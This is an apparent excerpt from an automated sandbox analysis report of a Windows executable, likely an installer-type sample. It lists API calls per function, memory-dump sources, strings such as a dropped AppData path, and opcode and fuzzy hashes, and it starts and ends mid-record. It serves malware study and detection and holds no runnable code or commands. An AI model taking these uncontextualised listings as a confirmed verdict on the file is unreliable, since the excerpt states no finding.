                                                          • Instruction Fuzzy Hash: F5F09032905115DBCB20FFA19D848DE62A49F01368B25057FF102F61D1C77C0E459AAE
                                                          APIs
                                                          • GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2482263763.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000000.00000002.2482210897.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000000.00000002.2482282589.0000000010003000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000000.00000002.2482380281.0000000010005000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10000000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: AllocGlobal
                                                          • String ID:
                                                          • API String ID: 3761449716-0
                                                          • Opcode ID: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
                                                          • Instruction ID: 8a0ecea123cfc10dc9c303f5c75fb6a011d4279a03f0c54a853e6fb6a4ccb70c
                                                          • Opcode Fuzzy Hash: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
                                                          • Instruction Fuzzy Hash: E3B012B0A00010DFFE00CB64CC8AF363358D740340F018000F701D0158C53088108638
                                                          APIs
                                                          • GetDlgItem.USER32(?,00000403), ref: 00405483
                                                          • GetDlgItem.USER32(?,000003EE), ref: 00405492
                                                          • GetClientRect.USER32(?,?), ref: 004054CF
                                                          • GetSystemMetrics.USER32(00000002), ref: 004054D6
                                                          • SendMessageW.USER32(?,00001061,00000000,?), ref: 004054F7
                                                          • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405508
                                                          • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040551B
                                                          • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405529
                                                          • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040553C
                                                          • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040555E
                                                          • ShowWindow.USER32(?,00000008), ref: 00405572
                                                          • GetDlgItem.USER32(?,000003EC), ref: 00405593
                                                          • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004055A3
                                                          • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004055BC
                                                          • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004055C8
                                                          • GetDlgItem.USER32(?,000003F8), ref: 004054A1
                                                            • Part of subcall function 0040424C: SendMessageW.USER32(00000028,?,00000001,00404077), ref: 0040425A
                                                          • GetDlgItem.USER32(?,000003EC), ref: 004055E5
                                                          • CreateThread.KERNEL32(00000000,00000000,Function_000053B9,00000000), ref: 004055F3
                                                          • CloseHandle.KERNEL32(00000000), ref: 004055FA
                                                          • ShowWindow.USER32(00000000), ref: 0040561E
                                                          • ShowWindow.USER32(?,00000008), ref: 00405623
                                                          • ShowWindow.USER32(00000008), ref: 0040566D
                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004056A1
                                                          • CreatePopupMenu.USER32 ref: 004056B2
                                                          • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004056C6
                                                          • GetWindowRect.USER32(?,?), ref: 004056E6
                                                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004056FF
                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405737
                                                          • OpenClipboard.USER32(00000000), ref: 00405747
                                                          • EmptyClipboard.USER32 ref: 0040574D
                                                          • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405759
                                                          • GlobalLock.KERNEL32(00000000), ref: 00405763
                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405777
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00405797
                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 004057A2
                                                          • CloseClipboard.USER32 ref: 004057A8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2467488389.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467525921.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467643039.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                          • String ID: {
                                                          • API String ID: 590372296-366298937
                                                          • Opcode ID: 008adb25098ef1b1bb6e7edf5b259777504a6f11eb67abc6bb5002a761aaad34
                                                          • Instruction ID: 2f82927f57e7d4f45bca6e23eab998b55dded590160266c2ba262d9988700e91
                                                          • Opcode Fuzzy Hash: 008adb25098ef1b1bb6e7edf5b259777504a6f11eb67abc6bb5002a761aaad34
                                                          • Instruction Fuzzy Hash: 37B16970800608BFDB119FA0DD89AAE7B79FB48355F00403AFA45B61A0CB759E51DF68
                                                          APIs
                                                          • GetDlgItem.USER32(?,000003FB), ref: 00404735
                                                          • SetWindowTextW.USER32(00000000,?), ref: 0040475F
                                                          • SHBrowseForFolderW.SHELL32(?), ref: 00404810
                                                          • CoTaskMemFree.OLE32(00000000), ref: 0040481B
                                                          • lstrcmpiW.KERNEL32(Call,0042D248,00000000,?,?), ref: 0040484D
                                                          • lstrcatW.KERNEL32(?,Call), ref: 00404859
                                                          • SetDlgItemTextW.USER32(?,000003FB,?), ref: 0040486B
                                                            • Part of subcall function 004058C8: GetDlgItemTextW.USER32(?,?,00000400,004048A2), ref: 004058DB
                                                            • Part of subcall function 00406516: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\450707124374000811.exe",0040334E,C:\Users\user\AppData\Local\Temp\,74DF3420,004035BF,?,00000006,00000008,0000000A), ref: 00406579
                                                            • Part of subcall function 00406516: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406588
                                                            • Part of subcall function 00406516: CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\450707124374000811.exe",0040334E,C:\Users\user\AppData\Local\Temp\,74DF3420,004035BF,?,00000006,00000008,0000000A), ref: 0040658D
                                                            • Part of subcall function 00406516: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\450707124374000811.exe",0040334E,C:\Users\user\AppData\Local\Temp\,74DF3420,004035BF,?,00000006,00000008,0000000A), ref: 004065A0
                                                          • GetDiskFreeSpaceW.KERNEL32(0042B218,?,?,0000040F,?,0042B218,0042B218,?,00000001,0042B218,?,?,000003FB,?), ref: 0040492E
                                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404949
                                                            • Part of subcall function 00404AA2: lstrlenW.KERNEL32(0042D248,0042D248,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B43
                                                            • Part of subcall function 00404AA2: wsprintfW.USER32 ref: 00404B4C
                                                            • Part of subcall function 00404AA2: SetDlgItemTextW.USER32(?,0042D248), ref: 00404B5F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000000.00000002.2467488389.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2467525921.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2467545091.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2467545091.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2467545091.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2467545091.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2467545091.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2467643039.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                          • String ID: A$C:\Users\user\AppData\Roaming\pechay\transskribere\jon$Call
                                                          • API String ID: 2624150263-251418098
                                                          • Opcode ID: 2bf24cd5b38970458feb5e26e62e94a42910e0745c64cb7450705bda54c983ff
                                                          • Instruction ID: b9cd804fa769b9c0a994065299bacf789a546679ae48146ccc486c737bfd155f
                                                          • Opcode Fuzzy Hash: 2bf24cd5b38970458feb5e26e62e94a42910e0745c64cb7450705bda54c983ff
                                                          • Instruction Fuzzy Hash: CBA175F1A00209ABDB11AFA5CD41AAFB7B8EF84354F10847BF601B62D1D77C99418B6D
                                                          APIs
                                                            • Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                          • GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 10001C24
                                                          • lstrcpyW.KERNEL32(00000008,?), ref: 10001C6C
                                                          • lstrcpyW.KERNEL32(00000808,?), ref: 10001C76
                                                          • GlobalFree.KERNEL32(00000000), ref: 10001C89
                                                          • GlobalFree.KERNEL32(?), ref: 10001D83
                                                          • GlobalFree.KERNEL32(?), ref: 10001D88
                                                          • GlobalFree.KERNEL32(?), ref: 10001D8D
                                                          • GlobalFree.KERNEL32(00000000), ref: 10001F38
                                                          • lstrcpyW.KERNEL32(?,?), ref: 1000209C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2482263763.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                           • Associated: 00000000.00000002.2482210897.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000000.00000002.2482282589.0000000010003000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000000.00000002.2482380281.0000000010005000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10000000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: Global$Free$lstrcpy$Alloc
                                                          • String ID:
                                                          • API String ID: 4227406936-0
                                                          • Opcode ID: 5a24c136153c29b9d98a91a4f463aeb2504b823c6cdae7135cdbbdb8769d9cc1
                                                          • Instruction ID: 952ca616c20dc2fa21031af5d26a5f3ec91fa4f9dea92b18a1e2b318678e368b
                                                          • Opcode Fuzzy Hash: 5a24c136153c29b9d98a91a4f463aeb2504b823c6cdae7135cdbbdb8769d9cc1
                                                          • Instruction Fuzzy Hash: 10129C75D0064AEFEB20CFA4C8806EEB7F4FB083D4F61452AE565E7198D774AA80DB50
                                                          APIs
                                                          • CoCreateInstance.OLE32(004085E8,?,00000001,004085D8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040217D
                                                          Strings
                                                          • C:\Users\user\AppData\Roaming\pechay\transskribere\jon, xrefs: 004021BD
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000000.00000002.2467488389.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2467525921.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2467545091.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2467545091.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2467545091.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2467545091.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2467545091.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2467643039.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: CreateInstance
                                                          • String ID: C:\Users\user\AppData\Roaming\pechay\transskribere\jon
                                                          • API String ID: 542301482-410581097
                                                          • Opcode ID: a3079df28c9350d7309c2a19df5477558aa8a9c325ce021c01e80fddd7990195
                                                          • Instruction ID: 2ba5a37aa1c239f751097cd18d9f1051e5d6a8806e2346af1523e8cbd5355f1b
                                                          • Opcode Fuzzy Hash: a3079df28c9350d7309c2a19df5477558aa8a9c325ce021c01e80fddd7990195
                                                          • Instruction Fuzzy Hash: 504139B5A00208AFCB10DFE4C988AAEBBB5FF48314F20457AF515EB2D1DB799941CB44
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000000.00000002.2467488389.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2467525921.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2467545091.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2467545091.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2467545091.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2467545091.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2467545091.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2467643039.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: p!C$p!C
                                                          • API String ID: 0-3125587631
                                                          • Opcode ID: b391703ce6aa9d184f83615265780e2503839b4fa6daee6685a5ac04655da8ea
                                                          • Instruction ID: ef217add9e462a39eaf01b2cd615f348b30b4b8a27c4232395f9688b09cd85c2
                                                          • Opcode Fuzzy Hash: b391703ce6aa9d184f83615265780e2503839b4fa6daee6685a5ac04655da8ea
                                                          • Instruction Fuzzy Hash: 33C15831E04219DBDF18CF68C8905EEBBB2BF88314F25826AD85677380D734A942CF95
                                                          APIs
                                                          • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402871
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000000.00000002.2467488389.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2467525921.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2467545091.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2467545091.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2467545091.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2467545091.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2467545091.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2467643039.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: FileFindFirst
                                                          • String ID:
                                                          • API String ID: 1974802433-0
                                                          • Opcode ID: d3449d240157211f65d4661233ebdf21600f3235833f1e3ab3d1db94ad861236
                                                          • Instruction ID: dc4ef17723f846daade3f6bb5fabbbbae416fabd81b1269148e1e628f00bda2f
                                                          • Opcode Fuzzy Hash: d3449d240157211f65d4661233ebdf21600f3235833f1e3ab3d1db94ad861236
                                                          • Instruction Fuzzy Hash: 9DF08271A04104EFD710EBA4DD499ADB378EF00324F2105BBF515F61D1D7B44E449B1A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000000.00000002.2467488389.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2467525921.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2467545091.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2467545091.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2467545091.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2467545091.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2467545091.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2467643039.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5a4ae33423394c5bea169515a796ff1213356ce6b05ba1201df3d6212e3a5333
                                                          • Instruction ID: c2d777d08f91faa28cc29f4af1d325e94f95b1c5ec16d27d51274fd7273dd8ba
                                                          • Opcode Fuzzy Hash: 5a4ae33423394c5bea169515a796ff1213356ce6b05ba1201df3d6212e3a5333
                                                          • Instruction Fuzzy Hash: A4E18971A04709DFDB24CF59C880BAAB7F1EB44305F15852EE497AB2D1D778AA91CF04
                                                          APIs
                                                          • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404452
                                                          • GetDlgItem.USER32(?,000003E8), ref: 00404466
                                                          • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404483
                                                          • GetSysColor.USER32(?), ref: 00404494
                                                          • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004044A2
                                                          • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004044B0
                                                          • lstrlenW.KERNEL32(?), ref: 004044B5
                                                          • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004044C2
                                                          • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004044D7
                                                          • GetDlgItem.USER32(?,0000040A), ref: 00404530
                                                          • SendMessageW.USER32(00000000), ref: 00404537
                                                          • GetDlgItem.USER32(?,000003E8), ref: 00404562
                                                          • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004045A5
                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 004045B3
                                                          • SetCursor.USER32(00000000), ref: 004045B6
                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 004045CF
                                                          • SetCursor.USER32(00000000), ref: 004045D2
                                                          • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404601
                                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404613
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000000.00000002.2467488389.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2467525921.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2467545091.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2467545091.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2467545091.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2467545091.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2467545091.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2467643039.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                          • String ID: +C@$Call$N
                                                          • API String ID: 3103080414-3697844480
                                                          • Opcode ID: 9a2d0ca3c2f6281e852f2d8aeca5f3bca76ad293f1c4d3c8d798300b4eb97cdc
                                                          • Instruction ID: 544d3524579c470af9434eda2f0c3a81960274dfcdaaec18bef3a5beb83851d9
                                                          • Opcode Fuzzy Hash: 9a2d0ca3c2f6281e852f2d8aeca5f3bca76ad293f1c4d3c8d798300b4eb97cdc
                                                          • Instruction Fuzzy Hash: 0C6192B1A00209BFDB109F60DD85AAA7B79FB84345F00843AF605B72D0D779A951CFA8
                                                          APIs
                                                          • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                          • BeginPaint.USER32(?,?), ref: 00401047
                                                          • GetClientRect.USER32(?,?), ref: 0040105B
                                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                          • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                          • DeleteObject.GDI32(?), ref: 004010ED
                                                          • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                          • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                          • SelectObject.GDI32(00000000,?), ref: 00401140
                                                          • DrawTextW.USER32(00000000,00433EE0,000000FF,00000010,00000820), ref: 00401156
                                                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                          • DeleteObject.GDI32(?), ref: 00401165
                                                          • EndPaint.USER32(?,?), ref: 0040116E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000000.00000002.2467488389.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2467525921.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2467545091.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2467545091.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2467545091.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2467545091.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2467545091.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2467643039.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                          • String ID: F
                                                          • API String ID: 941294808-1304234792
                                                          • Opcode ID: e215112caf94b1f54c3d659d29471f2010c28c8ad64a223ce82802b434a3cd12
                                                          • Instruction ID: 68187ad06c86d7515f13608b457f8be07a0117cb3bcf177897c910b083aea3f1
                                                          • Opcode Fuzzy Hash: e215112caf94b1f54c3d659d29471f2010c28c8ad64a223ce82802b434a3cd12
                                                          • Instruction Fuzzy Hash: 9A418C71800209AFCF058F95DE459AF7BB9FF44315F00842AF591AA1A0C778EA54DFA4
                                                          APIs
                                                          • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406069,?,?), ref: 00405F09
                                                          • GetShortPathNameW.KERNEL32(?,004308E8,00000400), ref: 00405F12
                                                            • Part of subcall function 00405CD9: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FC2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CE9
                                                            • Part of subcall function 00405CD9: lstrlenA.KERNEL32(00000000,?,00000000,00405FC2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D1B
                                                          • GetShortPathNameW.KERNEL32(?,004310E8,00000400), ref: 00405F2F
                                                          • wsprintfA.USER32 ref: 00405F4D
                                                          • GetFileSize.KERNEL32(00000000,00000000,004310E8,C0000000,00000004,004310E8,?,?,?,?,?), ref: 00405F88
                                                          • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405F97
                                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FCF
                                                          • SetFilePointer.KERNEL32(0040A560,00000000,00000000,00000000,00000000,004304E8,00000000,-0000000A,0040A560,00000000,[Rename],00000000,00000000,00000000), ref: 00406025
                                                          • GlobalFree.KERNEL32(00000000), ref: 00406036
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040603D
                                                            • Part of subcall function 00405D74: GetFileAttributesW.KERNELBASE(?,00402F01,C:\Users\user\Desktop\450707124374000811.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D78
                                                            • Part of subcall function 00405D74: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405D9A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000000.00000002.2467488389.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2467525921.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2467545091.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2467545091.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2467545091.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2467545091.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2467545091.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2467643039.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                          • String ID: %ls=%ls$[Rename]
                                                          • API String ID: 2171350718-461813615
                                                          • Opcode ID: 4764efec6bbb625c57c3953ed88dd39e9a4d7ef93366e848611a72397d906ad3
                                                          • Instruction ID: 79e357045524b81a8ea21183b2a6189fe473d9766cb3db532b5e95eed637b89f
                                                          • Opcode Fuzzy Hash: 4764efec6bbb625c57c3953ed88dd39e9a4d7ef93366e848611a72397d906ad3
                                                          • Instruction Fuzzy Hash: D1315771100B05ABD220AB669D48F6B3A9CDF45744F15003FF902F62D2EA7CD9118ABC
                                                          APIs
                                                          • CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\450707124374000811.exe",0040334E,C:\Users\user\AppData\Local\Temp\,74DF3420,004035BF,?,00000006,00000008,0000000A), ref: 00406579
                                                          • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406588
                                                          • CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\450707124374000811.exe",0040334E,C:\Users\user\AppData\Local\Temp\,74DF3420,004035BF,?,00000006,00000008,0000000A), ref: 0040658D
                                                          • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\450707124374000811.exe",0040334E,C:\Users\user\AppData\Local\Temp\,74DF3420,004035BF,?,00000006,00000008,0000000A), ref: 004065A0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2467488389.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467525921.0000000000408000.00000002.00000001.01000000.00000003.sdmp
